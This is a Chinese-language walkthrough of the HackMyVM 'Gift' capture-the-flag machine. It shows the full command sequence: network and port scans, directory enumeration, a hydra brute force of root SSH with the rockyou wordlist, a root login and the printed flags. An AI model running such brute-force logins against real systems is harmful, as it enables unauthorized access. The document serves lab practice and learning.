HackMyVM-Gift

news2024/11/26 2:53:38

信息收集

arp

nmap

WEB

dirsearch

hydra

ssh连接

get root

信息收集

arp

┌─[root@parrot]─[~]
└──╼ #arp-scan -l
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:16:3d:f8, IPv4: 192.168.9.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.106  08:00:27:a3:06:17  PCS Systemtechnik GmbH

Ending arp-scan 1.10.0: 256 hosts scanned in 1.975 seconds (129.62 hosts/sec). 6 res

nmap

端口扫描

┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -p- 192.168.9.106 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-13 10:33 GMT
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.62% done; ETC: 10:33 (0:00:02 remaining)
Nmap scan report for 192.168.9.106
Host is up (0.00077s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:A3:06:17 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 45.15 seconds

服务版本信息收集

┌─[✗]─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -sC -sV -p 22,80 192.168.9.106 --min-rate 10000 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-13 10:38 GMT
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 10:38 (0:00:06 remaining)
Nmap scan report for 192.168.9.106
Host is up (0.00058s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey: 
|   3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
|   256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_  256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open  http    nginx
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:A3:06:17 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.07 seconds

WEB

dirsearch

┌─[root@parrot]─[~/HackMyVM]
└──╼ #dirsearch -u http://192.168.9.106/

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/HackMyVM/reports/http_192.168.9.106/__24-04-13_11-15-10.txt

Target: http://192.168.9.106/

[11:15:10] Starting: 

Task Completed

 很简单？？

hydra

既然80端口没有信息，我们直接爆破22端口得了！

┌─[roolting@parrot]─[/root/HackMyVM]
└──╼ $hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.9.106
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-13 11:15:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.9.106:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[22][ssh] host: 192.168.9.106   login: root   password: simple
[STATUS] 4781466.33 tries/min, 14344399 tries in 00:03h, 3 to do in 00:01h, 10 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-13 11:19:19

ssh连接

┌─[roolting@parrot]─[/root/HackMyVM]
└──╼ $ssh root@192.168.9.106
root@192.168.9.106's password: 
IM AN SSH SERVER
gift:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
gift:~#

get root

gift:~# cd /root
gift:~# ls -al
total 20
drwx------    2 root     root          4096 Sep 24  2020 .
drwxr-xr-x   22 root     root          4096 Sep 18  2020 ..
-rw-------    1 root     root            79 Apr 13 11:23 .ash_history
----------    1 root     root            12 Sep 24  2020 root.txt
-rw-rw----    1 root     root            12 Sep 24  2020 user.txt
gift:~# cat *.txt
HMVtyr543FG
HMV665sXzDS

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1600195.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！